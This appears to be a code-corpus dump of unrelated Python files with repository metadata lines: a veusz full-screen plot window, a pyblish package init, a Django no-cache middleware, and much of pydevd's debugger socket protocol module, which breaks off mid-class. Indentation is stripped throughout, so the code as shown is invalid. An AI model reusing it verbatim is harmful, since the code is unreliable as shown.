"""Add control graphs for the widgets given."""
# delete old items from root
for c in list(self.controlgraphroot.childItems()):
self.scene.removeItem(c)
# add each item to the root
if self.painthelper:
for widget in widgets:
cgis = self.painthelper.getControlGraph(widget)
if cgis:
for control in cgis:
control.createGraphicsItem(self.controlgraphroot)
class FullScreenPlotWindow(qt4.QScrollArea):
"""Window for showing plot in full-screen mode."""
def __init__(self, document, pagenumber):
qt4.QScrollArea.__init__(self)
self.setFrameShape(qt4.QFrame.NoFrame)
self.setWidgetResizable(True)
# window which shows plot
self.document = document
pw = self.plotwin = PlotWindow(document, None)
pw.isfullscreen = True
pw.pagenumber = pagenumber
self.setWidget(pw)
pw.setFocus()
self.showFullScreen()
self.toolbar = qt4.QToolBar(_("Full screen toolbar"), self)
self.toolbar.addAction(utils.getIcon("kde-window-close"), _("Close"),
self.close)
for a in ('view.zoom11', 'view.zoomin', 'view.zoomout',
'view.zoomwidth', 'view.zoomheight',
'view.zoompage', 'view.prevpage', 'view.nextpage'):
self.toolbar.addAction( pw.vzactions[a] )
self.toolbar.show()
def resizeEvent(self, event):
"""Make zoom fit screen."""
qt4.QScrollArea.resizeEvent(self, event)
# size graph to fill screen
pagesize = self.document.pageSize(self.plotwin.pagenumber,
dpi=self.plotwin.dpi)
screensize = self.plotwin.size()
aspectw = screensize.width() / pagesize[0]
aspecth = screensize.height() / pagesize[1]
self.plotwin.zoomfactor = min(aspectw, aspecth)
self.plotwin.checkPlotUpdate()
def keyPressEvent(self, event):
k = event.key()
if k == qt4.Qt.Key_Escape:
event.accept()
self.close()
return
qt4.QScrollArea.keyPressEvent(self, event)
| mythsmith/veusz | veusz/windows/plotwindow.py | Python | gpl-2.0 | 47,229 |
from .version import *
from .lib import (
show,
setup,
register_plugins,
add_to_filemenu,
)
| pyblish/pyblish-nukestudio | pyblish_nukestudio/__init__.py | Python | lgpl-3.0 | 108 |
class NoCache(object):
def process_response(self, request, response):
"""
set the "Cache-Control" header to "must-revalidate, no-cache"
"""
print "Check for serving static file: %s" % request.path
if request.path.startswith('/static/'):
print "Serving static file: %s" % request.path
response['Cache-Control'] = 'must-revalidate, no-cache'
return response
| moteloquito/final-project | final/middleware/nocache.py | Python | gpl-3.0 | 442 |
''' pydevd - a debugging daemon
This is the daemon you launch for python remote debugging.
Protocol:
each command has a format:
id\tsequence-num\ttext
id: protocol command number
sequence-num: each request has a sequence number. Sequence numbers
originating at the debugger are odd, sequence numbers originating
at the daemon are even. Every response uses the same sequence number
as the request.
payload: it is protocol dependent. When response is a complex structure, it
is returned as XML. Each attribute value is urlencoded, and then the whole
payload is urlencoded again to prevent stray characters corrupting protocol/xml encodings
Commands:
NUMBER NAME FROM* ARGUMENTS RESPONSE NOTE
100 series: program execution
101 RUN JAVA - -
102 LIST_THREADS JAVA RETURN with XML listing of all threads
103 THREAD_CREATE PYDB - XML with thread information
104 THREAD_KILL JAVA id (or * to exit) kills the thread
PYDB id nofies JAVA that thread was killed
105 THREAD_SUSPEND JAVA XML of the stack, suspends the thread
reason for suspension
PYDB id notifies JAVA that thread was suspended
106 CMD_THREAD_RUN JAVA id resume the thread
PYDB id \t reason notifies JAVA that thread was resumed
107 STEP_INTO JAVA thread_id
108 STEP_OVER JAVA thread_id
109 STEP_RETURN JAVA thread_id
110 GET_VARIABLE JAVA thread_id \t frame_id \t GET_VARIABLE with XML of var content
FRAME|GLOBAL \t attributes*
111 SET_BREAK JAVA file/line of the breakpoint
112 REMOVE_BREAK JAVA file/line of the return
113 CMD_EVALUATE_EXPRESSION JAVA expression result of evaluating the expression
114 CMD_GET_FRAME JAVA request for frame contents
115 CMD_EXEC_EXPRESSION JAVA
116 CMD_WRITE_TO_CONSOLE PYDB
117 CMD_CHANGE_VARIABLE
118 CMD_RUN_TO_LINE
119 CMD_RELOAD_CODE
120 CMD_GET_COMPLETIONS JAVA
500 series diagnostics/ok
501 VERSION either Version string (1.0) Currently just used at startup
502 RETURN either Depends on caller -
900 series: errors
901 ERROR either - This is reserved for unexpected errors.
* JAVA - remote debugger, the java end
* PYDB - pydevd, the python end
'''
import os
from _pydev_bundle.pydev_imports import _queue
from _pydev_imps._pydev_saved_modules import time
from _pydev_imps._pydev_saved_modules import thread
from _pydev_imps._pydev_saved_modules import threading
from _pydev_imps._pydev_saved_modules import socket
from socket import socket, AF_INET, SOCK_STREAM, SHUT_RD, SHUT_WR, SOL_SOCKET, SO_REUSEADDR, SHUT_RDWR, timeout
from _pydevd_bundle.pydevd_constants import DebugInfoHolder, dict_contains, get_thread_id, IS_JYTHON, IS_PY2, IS_PY3K, IS_PY36_OR_GREATER, \
STATE_RUN
try:
from urllib import quote_plus, unquote, unquote_plus
except:
from urllib.parse import quote_plus, unquote, unquote_plus #@Reimport @UnresolvedImport
import pydevconsole
from _pydevd_bundle import pydevd_vars
from _pydevd_bundle import pydevd_xml
from _pydevd_bundle import pydevd_tracing
from _pydevd_bundle import pydevd_vm_type
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame, NORM_PATHS_AND_BASE_CONTAINER, norm_file_to_client
import sys
import traceback
from _pydevd_bundle.pydevd_utils import quote_smart as quote, compare_object_attrs, cmp_to_key, to_string
from _pydev_bundle import pydev_log
from _pydev_bundle import _pydev_completer
from _pydevd_bundle.pydevd_tracing import get_exception_traceback_str
from _pydevd_bundle import pydevd_console
from _pydev_bundle.pydev_monkey import disable_trace_thread_modules, enable_trace_thread_modules
CMD_RUN = 101
CMD_LIST_THREADS = 102
CMD_THREAD_CREATE = 103
CMD_THREAD_KILL = 104
CMD_THREAD_SUSPEND = 105
CMD_THREAD_RUN = 106
CMD_STEP_INTO = 107
CMD_STEP_OVER = 108
CMD_STEP_RETURN = 109
CMD_GET_VARIABLE = 110
CMD_SET_BREAK = 111
CMD_REMOVE_BREAK = 112
CMD_EVALUATE_EXPRESSION = 113
CMD_GET_FRAME = 114
CMD_EXEC_EXPRESSION = 115
CMD_WRITE_TO_CONSOLE = 116
CMD_CHANGE_VARIABLE = 117
CMD_RUN_TO_LINE = 118
CMD_RELOAD_CODE = 119
CMD_GET_COMPLETIONS = 120
# Note: renumbered (conflicted on merge)
CMD_CONSOLE_EXEC = 121
CMD_ADD_EXCEPTION_BREAK = 122
CMD_REMOVE_EXCEPTION_BREAK = 123
CMD_LOAD_SOURCE = 124
CMD_ADD_DJANGO_EXCEPTION_BREAK = 125
CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126
CMD_SET_NEXT_STATEMENT = 127
CMD_SMART_STEP_INTO = 128
CMD_EXIT = 129
CMD_SIGNATURE_CALL_TRACE = 130
CMD_SET_PY_EXCEPTION = 131
CMD_GET_FILE_CONTENTS = 132
CMD_SET_PROPERTY_TRACE = 133
# Pydev debug console commands
CMD_EVALUATE_CONSOLE_EXPRESSION = 134
CMD_RUN_CUSTOM_OPERATION = 135
CMD_GET_BREAKPOINT_EXCEPTION = 136
CMD_STEP_CAUGHT_EXCEPTION = 137
CMD_SEND_CURR_EXCEPTION_TRACE = 138
CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED = 139
CMD_IGNORE_THROWN_EXCEPTION_AT = 140
CMD_ENABLE_DONT_TRACE = 141
CMD_SHOW_CONSOLE = 142
CMD_GET_ARRAY = 143
CMD_STEP_INTO_MY_CODE = 144
CMD_GET_CONCURRENCY_EVENT = 145
CMD_SHOW_RETURN_VALUES = 146
CMD_INPUT_REQUESTED = 147
CMD_GET_DESCRIPTION = 148
CMD_PROCESS_CREATED = 149
CMD_SHOW_CYTHON_WARNING = 150
CMD_VERSION = 501
CMD_RETURN = 502
CMD_ERROR = 901
ID_TO_MEANING = {
'101': 'CMD_RUN',
'102': 'CMD_LIST_THREADS',
'103': 'CMD_THREAD_CREATE',
'104': 'CMD_THREAD_KILL',
'105': 'CMD_THREAD_SUSPEND',
'106': 'CMD_THREAD_RUN',
'107': 'CMD_STEP_INTO',
'108': 'CMD_STEP_OVER',
'109': 'CMD_STEP_RETURN',
'110': 'CMD_GET_VARIABLE',
'111': 'CMD_SET_BREAK',
'112': 'CMD_REMOVE_BREAK',
'113': 'CMD_EVALUATE_EXPRESSION',
'114': 'CMD_GET_FRAME',
'115': 'CMD_EXEC_EXPRESSION',
'116': 'CMD_WRITE_TO_CONSOLE',
'117': 'CMD_CHANGE_VARIABLE',
'118': 'CMD_RUN_TO_LINE',
'119': 'CMD_RELOAD_CODE',
'120': 'CMD_GET_COMPLETIONS',
'121': 'CMD_CONSOLE_EXEC',
'122': 'CMD_ADD_EXCEPTION_BREAK',
'123': 'CMD_REMOVE_EXCEPTION_BREAK',
'124': 'CMD_LOAD_SOURCE',
'125': 'CMD_ADD_DJANGO_EXCEPTION_BREAK',
'126': 'CMD_REMOVE_DJANGO_EXCEPTION_BREAK',
'127': 'CMD_SET_NEXT_STATEMENT',
'128': 'CMD_SMART_STEP_INTO',
'129': 'CMD_EXIT',
'130': 'CMD_SIGNATURE_CALL_TRACE',
'131': 'CMD_SET_PY_EXCEPTION',
'132': 'CMD_GET_FILE_CONTENTS',
'133': 'CMD_SET_PROPERTY_TRACE',
'134': 'CMD_EVALUATE_CONSOLE_EXPRESSION',
'135': 'CMD_RUN_CUSTOM_OPERATION',
'136': 'CMD_GET_BREAKPOINT_EXCEPTION',
'137': 'CMD_STEP_CAUGHT_EXCEPTION',
'138': 'CMD_SEND_CURR_EXCEPTION_TRACE',
'139': 'CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED',
'140': 'CMD_IGNORE_THROWN_EXCEPTION_AT',
'141': 'CMD_ENABLE_DONT_TRACE',
'142': 'CMD_SHOW_CONSOLE',
'143': 'CMD_GET_ARRAY',
'144': 'CMD_STEP_INTO_MY_CODE',
'145': 'CMD_GET_CONCURRENCY_EVENT',
'146': 'CMD_SHOW_RETURN_VALUES',
'147': 'CMD_INPUT_REQUESTED',
'148': 'CMD_GET_DESCRIPTION',
'149': 'CMD_PROCESS_CREATED',
'150': 'CMD_SHOW_CYTHON_WARNING',
'501': 'CMD_VERSION',
'502': 'CMD_RETURN',
'901': 'CMD_ERROR',
}
MAX_IO_MSG_SIZE = 1000 #if the io is too big, we'll not send all (could make the debugger too non-responsive)
#this number can be changed if there's need to do so
VERSION_STRING = "@@BUILD_NUMBER@@"
from _pydev_bundle._pydev_filesystem_encoding import getfilesystemencoding
file_system_encoding = getfilesystemencoding()
#--------------------------------------------------------------------------------------------------- UTILITIES
#=======================================================================================================================
# pydevd_log
#=======================================================================================================================
def pydevd_log(level, *args):
""" levels are:
0 most serious warnings/errors
1 warnings/significant events
2 informational trace
"""
if level <= DebugInfoHolder.DEBUG_TRACE_LEVEL:
#yes, we can have errors printing if the console of the program has been finished (and we're still trying to print something)
try:
sys.stderr.write('%s\n' % (args,))
except:
pass
#=======================================================================================================================
# GlobalDebuggerHolder
#=======================================================================================================================
class GlobalDebuggerHolder:
'''
Holder for the global debugger.
'''
global_dbg = None # Note: don't rename (the name is used in our attach to process)
#=======================================================================================================================
# get_global_debugger
#=======================================================================================================================
def get_global_debugger():
return GlobalDebuggerHolder.global_dbg
GetGlobalDebugger = get_global_debugger # Backward-compatibility
#=======================================================================================================================
# set_global_debugger
#=======================================================================================================================
def set_global_debugger(dbg):
GlobalDebuggerHolder.global_dbg = dbg
#------------------------------------------------------------------- ACTUAL COMM
#=======================================================================================================================
# PyDBDaemonThread
#=======================================================================================================================
class PyDBDaemonThread(threading.Thread):
created_pydb_daemon_threads = {}
def __init__(self):
threading.Thread.__init__(self)
self.setDaemon(True)
self.killReceived = False
self.pydev_do_not_trace = True
self.is_pydev_daemon_thread = True
def run(self):
created_pydb_daemon = self.created_pydb_daemon_threads
created_pydb_daemon[self] = 1
try:
try:
if IS_JYTHON and not isinstance(threading.currentThread(), threading._MainThread):
# we shouldn't update sys.modules for the main thread, cause it leads to the second importing 'threading'
# module, and the new instance of main thread is created
import org.python.core as PyCore #@UnresolvedImport
ss = PyCore.PySystemState()
# Note: Py.setSystemState() affects only the current thread.
PyCore.Py.setSystemState(ss)
self._on_run()
except:
if sys is not None and traceback is not None:
traceback.print_exc()
finally:
del created_pydb_daemon[self]
def _on_run(self):
raise NotImplementedError('Should be reimplemented by: %s' % self.__class__)
def do_kill_pydev_thread(self):
#that was not working very well because jython gave some socket errors
self.killReceived = True
def _stop_trace(self):
if self.pydev_do_not_trace:
disable_tracing = True
if pydevd_vm_type.get_vm_type() == pydevd_vm_type.PydevdVmType.JYTHON and sys.hexversion <= 0x020201f0:
# don't run untraced threads if we're in jython 2.2.1 or lower
# jython bug: if we start a thread and another thread changes the tracing facility
# it affects other threads (it's not set only for the thread but globally)
# Bug: http://sourceforge.net/tracker/index.php?func=detail&aid=1870039&group_id=12867&atid=112867
disable_tracing = False
if disable_tracing:
pydevd_tracing.SetTrace(None) # no debugging on this thread
#=======================================================================================================================
# ReaderThread
#=======================================================================================================================
class ReaderThread(PyDBDaemonThread):
""" reader thread reads and dispatches commands in an infinite loop """
def __init__(self, sock):
PyDBDaemonThread.__init__(self)
self.sock = sock
self.setName("pydevd.Reader")
from _pydevd_bundle.pydevd_process_net_command import process_net_command
self.process_net_command = process_net_command
self.global_debugger_holder = GlobalDebuggerHolder
def do_kill_pydev_thread(self):
#We must close the socket so that it doesn't stay halted there.
self.killReceived = True
try:
self.sock.shutdown(SHUT_RD) #shutdown the socket for read
except:
#just ignore that
pass
def _on_run(self):
self._stop_trace()
read_buffer = ""
try:
while not self.killReceived:
try:
r = self.sock.recv(1024)
except:
if not self.killReceived:
traceback.print_exc()
self.handle_except()
return #Finished communication.
#Note: the java backend is always expected to pass utf-8 encoded strings. We now work with unicode
#internally and thus, we may need to convert to the actual encoding where needed (i.e.: filenames
#on python 2 may need to be converted to the filesystem encoding).
if hasattr(r, 'decode'):
r = r.decode('utf-8')
read_buffer += r
if DebugInfoHolder.DEBUG_RECORD_SOCKET_READS:
sys.stderr.write('debugger: received >>%s<<\n' % (read_buffer,))
sys.stderr.flush()
if len(read_buffer) == 0:
self.handle_except()
break
while read_buffer.find('\n') != -1:
command, read_buffer = read_buffer.split('\n', 1)
args = command.split('\t', 2)
try:
cmd_id = int(args[0])
pydev_log.debug('Received command: %s %s\n' % (ID_TO_MEANING.get(str(cmd_id), '???'), command,))
self.process_command(cmd_id, int(args[1]), args[2])
except:
traceback.print_exc()
sys.stderr.write("Can't process net command: %s\n" % command)
sys.stderr.flush()
except:
traceback.print_exc()
self.handle_except()
def handle_except(self):
self.global_debugger_holder.global_dbg.finish_debugging_session()
def process_command(self, cmd_id, seq, text):
self.process_net_command(self.global_debugger_holder.global_dbg, cmd_id, seq, text)
#----------------------------------------------------------------------------------- SOCKET UTILITIES - WRITER
#=======================================================================================================================
# WriterThread
#=======================================================================================================================
class WriterThread(PyDBDaemonThread):
""" writer thread writes out the commands in an infinite loop """
def __init__(self, sock):
PyDBDaemonThread.__init__(self)
self.sock = sock
self.setName("pydevd.Writer")
self.cmdQueue = _queue.Queue()
if pydevd_vm_type.get_vm_type() == 'python':
self.timeout = 0
else:
self.timeout = 0.1
def add_command(self, cmd):
""" cmd is NetCommand """
if not self.killReceived: #we don't take new data after everybody die
self.cmdQueue.put(cmd)
def _on_run(self):
""" just loop and write responses """
self._stop_trace()
get_has_timeout = sys.hexversion >= 0x02030000 # 2.3 onwards have it.
try:
while True:
try:
try:
if get_has_timeout:
cmd = self.cmdQueue.get(1, 0.1)
else:
time.sleep(.01)
cmd = self.cmdQueue.get(0)
except _queue.Empty:
if self.killReceived:
try:
self.sock.shutdown(SHUT_WR)
self.sock.close()
except:
pass
return #break if queue is empty and killReceived
else:
continue
except:
#pydevd_log(0, 'Finishing debug communication...(1)')
#when liberating the thread here, we could have errors because we were shutting down
#but the thread was still not liberated
return
out = cmd.outgoing
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 1:
out_message = 'sending cmd --> '
out_message += "%20s" % ID_TO_MEANING.get(out[:3], 'UNKNOWN')
out_message += ' '
out_message += unquote(unquote(out)).replace('\n', ' ')
try:
sys.stderr.write('%s\n' % (out_message,))
except:
pass
if IS_PY3K:
out = bytearray(out, 'utf-8')
self.sock.send(out) #TODO: this does not guarantee that all message are sent (and jython does not have a send all)
if cmd.id == CMD_EXIT:
break
if time is None:
break #interpreter shutdown
time.sleep(self.timeout)
except Exception:
GlobalDebuggerHolder.global_dbg.finish_debugging_session()
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 0:
traceback.print_exc()
def empty(self):
return self.cmdQueue.empty()
#--------------------------------------------------- CREATING THE SOCKET THREADS
#=======================================================================================================================
# start_server
#=======================================================================================================================
def start_server(port):
""" binds to a port, waits for the debugger to connect """
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(None)
try:
from socket import SO_REUSEPORT
s.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
except ImportError:
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind(('', port))
pydevd_log(1, "Bound to port ", str(port))
try:
s.listen(1)
newSock, _addr = s.accept()
pydevd_log(1, "Connection accepted")
# closing server socket is not necessary but we don't need it
s.shutdown(SHUT_RDWR)
s.close()
return newSock
except:
sys.stderr.write("Could not bind to port: %s\n" % (port,))
sys.stderr.flush()
traceback.print_exc()
sys.exit(1) #TODO: is it safe?
#=======================================================================================================================
# start_client
#=======================================================================================================================
def start_client(host, port):
""" connects to a host/port """
pydevd_log(1, "Connecting to ", host, ":", str(port))
s = socket(AF_INET, SOCK_STREAM)
MAX_TRIES = 100
i = 0
while i<MAX_TRIES:
try:
s.connect((host, port))
except:
i+=1
time.sleep(0.2)
continue
pydevd_log(1, "Connected.")
return s
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
sys.stderr.flush()
traceback.print_exc()
sys.exit(1) #TODO: is it safe?
#------------------------------------------------------------------------------------ MANY COMMUNICATION STUFF
#=======================================================================================================================
# NetCommand
#=======================================================================================================================
class NetCommand:
""" Commands received/sent over the network.
Command can represent command received from the debugger,
or one to be sent by daemon.
"""
next_seq = 0 # sequence numbers
def __init__(self, id, seq, text):
""" smart handling of parameters
if sequence is 0, new sequence will be generated
if text has carriage returns they'll be replaced"""
self.id = id
if seq == 0:
NetCommand.next_seq += 2
seq = NetCommand.next_seq
self.seq = seq
self.text = text
encoded = quote(to_string(text), '/<>_=" \t')
self.outgoing = '%s\t%s\t%s\n' % (id, seq, encoded)
#=======================================================================================================================
# NetCommandFactory
#=======================================================================================================================
class NetCommandFactory:
def _thread_to_xml(self, thread):
""" thread information as XML """
name = pydevd_xml.make_valid_xml_value(thread.getName())
cmdText = '<thread name="%s" id="%s" />' % (quote(name), get_thread_id(thread))
return cmdText
def make_error_message(self, seq, text):
cmd = NetCommand(CMD_ERROR, seq, text)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
sys.stderr.write("Error: %s" % (text,))
return cmd
def make_thread_created_message(self, thread):
cmdText = "<xml>" + self._thread_to_xml(thread) + "</xml>"
return NetCommand(CMD_THREAD_CREATE, 0, cmdText)
def make_process_created_message(self):
cmdText = '<process/>'
return NetCommand(CMD_PROCESS_CREATED, 0, cmdText)
def make_show_cython_warning_message(self):
try:
return NetCommand(CMD_SHOW_CYTHON_WARNING, 0, '')
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_custom_frame_created_message(self, frameId, frameDescription):
frameDescription = pydevd_xml.make_valid_xml_value(frameDescription)
cmdText = '<xml><thread name="%s" id="%s"/></xml>' % (frameDescription, frameId)
return NetCommand(CMD_THREAD_CREATE, 0, cmdText)
def make_list_threads_message(self, seq):
""" returns thread listing as XML """
try:
t = threading.enumerate()
cmd_text = ["<xml>"]
append = cmd_text.append
for i in t:
if t.isAlive():
append(self._thread_to_xml(i))
append("</xml>")
return NetCommand(CMD_RETURN, seq, ''.join(cmd_text))
except:
return self.make_error_message(seq, get_exception_traceback_str())
def make_variable_changed_message(self, seq, payload):
# notify debugger that value was changed successfully
return NetCommand(CMD_RETURN, seq, payload)
def make_io_message(self, v, ctx, dbg=None):
'''
@param v: the message to pass to the debug server
@param ctx: 1 for stdio 2 for stderr
@param dbg: If not none, add to the writer
'''
try:
if len(v) > MAX_IO_MSG_SIZE:
v = v[0:MAX_IO_MSG_SIZE]
v += '...'
v = pydevd_xml.make_valid_xml_value(quote(v, '/>_= \t'))
net = NetCommand(str(CMD_WRITE_TO_CONSOLE), 0, '<xml><io s="%s" ctx="%s"/></xml>' % (v, ctx))
except:
net = self.make_error_message(0, get_exception_traceback_str())
if dbg:
dbg.writer.add_command(net)
return net
def make_version_message(self, seq):
try:
return NetCommand(CMD_VERSION, seq, VERSION_STRING)
except:
return self.make_error_message(seq, get_exception_traceback_str())
def make_thread_killed_message(self, id):
try:
return NetCommand(CMD_THREAD_KILL, 0, str(id))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_thread_suspend_str(self, thread_id, frame, stop_reason, message, suspend_type="trace"):
""" <xml>
<thread id="id" stop_reason="reason">
<frame id="id" name="functionName " file="file" line="line">
<var variable stuffff....
</frame>
</thread>
"""
cmd_text_list = ["<xml>"]
append = cmd_text_list.append
make_valid_xml_value = pydevd_xml.make_valid_xml_value
if message:
message = make_valid_xml_value(message)
append('<thread id="%s" stop_reason="%s" message="%s" suspend_type="%s">' % (thread_id, stop_reason, message, suspend_type))
curr_frame = frame
try:
while curr_frame:
#print cmdText
my_id = id(curr_frame)
#print "id is ", my_id
if curr_frame.f_code is None:
break #Iron Python sometimes does not have it!
my_name = curr_frame.f_code.co_name #method name (if in method) or ? if global
if my_name is None:
break #Iron Python sometimes does not have it!
#print "name is ", my_name
abs_path_real_path_and_base = get_abs_path_real_path_and_base_from_frame(curr_frame)
myFile = norm_file_to_client(abs_path_real_path_and_base[0])
if file_system_encoding.lower() != "utf-8" and hasattr(myFile, "decode"):
# myFile is a byte string encoded using the file system encoding
# convert it to utf8
myFile = myFile.decode(file_system_encoding).encode("utf-8")
#print "file is ", myFile
#myFile = inspect.getsourcefile(curr_frame) or inspect.getfile(frame)
myLine = str(curr_frame.f_lineno)
#print "line is ", myLine
#the variables are all gotten 'on-demand'
#variables = pydevd_xml.frame_vars_to_xml(curr_frame.f_locals)
variables = ''
append('<frame id="%s" name="%s" ' % (my_id , make_valid_xml_value(my_name)))
append('file="%s" line="%s">' % (quote(myFile, '/>_= \t'), myLine))
append(variables)
append("</frame>")
curr_frame = curr_frame.f_back
except :
traceback.print_exc()
append("</thread></xml>")
return ''.join(cmd_text_list)
def make_thread_suspend_message(self, thread_id, frame, stop_reason, message, suspend_type):
try:
return NetCommand(CMD_THREAD_SUSPEND, 0, self.make_thread_suspend_str(thread_id, frame, stop_reason, message, suspend_type))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_thread_run_message(self, id, reason):
try:
return NetCommand(CMD_THREAD_RUN, 0, str(id) + "\t" + str(reason))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_get_variable_message(self, seq, payload):
try:
return NetCommand(CMD_GET_VARIABLE, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_array_message(self, seq, payload):
try:
return NetCommand(CMD_GET_ARRAY, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_description_message(self, seq, payload):
try:
return NetCommand(CMD_GET_DESCRIPTION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_frame_message(self, seq, payload):
try:
return NetCommand(CMD_GET_FRAME, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_evaluate_expression_message(self, seq, payload):
try:
return NetCommand(CMD_EVALUATE_EXPRESSION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_completions_message(self, seq, payload):
try:
return NetCommand(CMD_GET_COMPLETIONS, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_file_contents(self, seq, payload):
try:
return NetCommand(CMD_GET_FILE_CONTENTS, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_send_breakpoint_exception_message(self, seq, payload):
try:
return NetCommand(CMD_GET_BREAKPOINT_EXCEPTION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_send_curr_exception_trace_message(self, seq, thread_id, curr_frame_id, exc_type, exc_desc, trace_obj):
try:
while trace_obj.tb_next is not None:
trace_obj = trace_obj.tb_next
exc_type = pydevd_xml.make_valid_xml_value(str(exc_type)).replace('\t', ' ') or 'exception: type unknown'
exc_desc = pydevd_xml.make_valid_xml_value(str(exc_desc)).replace('\t', ' ') or 'exception: no description'
payload = str(curr_frame_id) + '\t' + exc_type + "\t" + exc_desc + "\t" + \
self.make_thread_suspend_str(thread_id, trace_obj.tb_frame, CMD_SEND_CURR_EXCEPTION_TRACE, '')
return NetCommand(CMD_SEND_CURR_EXCEPTION_TRACE, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_send_curr_exception_trace_proceeded_message(self, seq, thread_id):
try:
return NetCommand(CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED, 0, str(thread_id))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_send_console_message(self, seq, payload):
try:
return NetCommand(CMD_EVALUATE_CONSOLE_EXPRESSION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_custom_operation_message(self, seq, payload):
try:
return NetCommand(CMD_RUN_CUSTOM_OPERATION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_load_source_message(self, seq, source, dbg=None):
try:
net = NetCommand(CMD_LOAD_SOURCE, seq, '%s' % source)
except:
net = self.make_error_message(0, get_exception_traceback_str())
if dbg:
dbg.writer.add_command(net)
return net
def make_show_console_message(self, thread_id, frame):
try:
return NetCommand(CMD_SHOW_CONSOLE, 0, self.make_thread_suspend_str(thread_id, frame, CMD_SHOW_CONSOLE, ''))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_input_requested_message(self, started):
try:
return NetCommand(CMD_INPUT_REQUESTED, 0, started)
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_exit_message(self):
try:
net = NetCommand(CMD_EXIT, 0, '')
except:
net = self.make_error_message(0, get_exception_traceback_str())
return net
INTERNAL_TERMINATE_THREAD = 1
INTERNAL_SUSPEND_THREAD = 2
#=======================================================================================================================
# InternalThreadCommand
#=======================================================================================================================
class InternalThreadCommand:
""" internal commands are generated/executed by the debugger.
The reason for their existence is that some commands have to be executed
on specific threads. These are the InternalThreadCommands that get
get posted to PyDB.cmdQueue.
"""
def can_be_executed_by(self, thread_id):
'''By default, it must be in the same thread to be executed
'''
return self.thread_id == thread_id or self.thread_id.endswith('|' + thread_id)
def do_it(self, dbg):
raise NotImplementedError("you have to override do_it")
class ReloadCodeCommand(InternalThreadCommand):
def __init__(self, module_name, thread_id):
self.thread_id = thread_id
self.module_name = module_name
self.executed = False
self.lock = thread.allocate_lock()
def can_be_executed_by(self, thread_id):
if self.thread_id == '*':
return True #Any thread can execute it!
return InternalThreadCommand.can_be_executed_by(self, thread_id)
def do_it(self, dbg):
self.lock.acquire()
try:
if self.executed:
return
self.executed = True
finally:
self.lock.release()
module_name = self.module_name
if not dict_contains(sys.modules, module_name):
if '.' in module_name:
new_module_name = module_name.split('.')[-1]
if dict_contains(sys.modules, new_module_name):
module_name = new_module_name
if not dict_contains(sys.modules, module_name):
sys.stderr.write('pydev debugger: Unable to find module to reload: "' + module_name + '".\n')
# Too much info...
# sys.stderr.write('pydev debugger: This usually means you are trying to reload the __main__ module (which cannot be reloaded).\n')
else:
sys.stderr.write('pydev debugger: Start reloading module: "' + module_name + '" ... \n')
from _pydevd_bundle import pydevd_reload
if pydevd_reload.xreload(sys.modules[module_name]):
sys.stderr.write('pydev debugger: reload finished\n')
else:
sys.stderr.write('pydev debugger: reload finished without applying any change\n')
#=======================================================================================================================
# InternalTerminateThread
#=======================================================================================================================
class InternalTerminateThread(InternalThreadCommand):
def __init__(self, thread_id):
self.thread_id = thread_id
def do_it(self, dbg):
pydevd_log(1, "killing ", str(self.thread_id))
cmd = dbg.cmd_factory.make_thread_killed_message(self.thread_id)
dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalRunThread
#=======================================================================================================================
class InternalRunThread(InternalThreadCommand):
def __init__(self, thread_id):
self.thread_id = thread_id
def do_it(self, dbg):
t = pydevd_find_thread_by_id(self.thread_id)
if t:
t.additional_info.pydev_step_cmd = -1
t.additional_info.pydev_step_stop = None
t.additional_info.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalStepThread
#=======================================================================================================================
class InternalStepThread(InternalThreadCommand):
def __init__(self, thread_id, cmd_id):
self.thread_id = thread_id
self.cmd_id = cmd_id
def do_it(self, dbg):
t = pydevd_find_thread_by_id(self.thread_id)
if t:
t.additional_info.pydev_step_cmd = self.cmd_id
t.additional_info.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalSetNextStatementThread
#=======================================================================================================================
class InternalSetNextStatementThread(InternalThreadCommand):
def __init__(self, thread_id, cmd_id, line, func_name):
self.thread_id = thread_id
self.cmd_id = cmd_id
self.line = line
if IS_PY2:
if isinstance(func_name, unicode):
# On cython with python 2.X it requires an str, not unicode (but on python 3.3 it should be a str, not bytes).
func_name = func_name.encode('utf-8')
self.func_name = func_name
def do_it(self, dbg):
t = pydevd_find_thread_by_id(self.thread_id)
if t:
t.additional_info.pydev_step_cmd = self.cmd_id
t.additional_info.pydev_next_line = int(self.line)
t.additional_info.pydev_func_name = self.func_name
t.additional_info.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalGetVariable
#=======================================================================================================================
class InternalGetVariable(InternalThreadCommand):
""" gets the value of a variable """
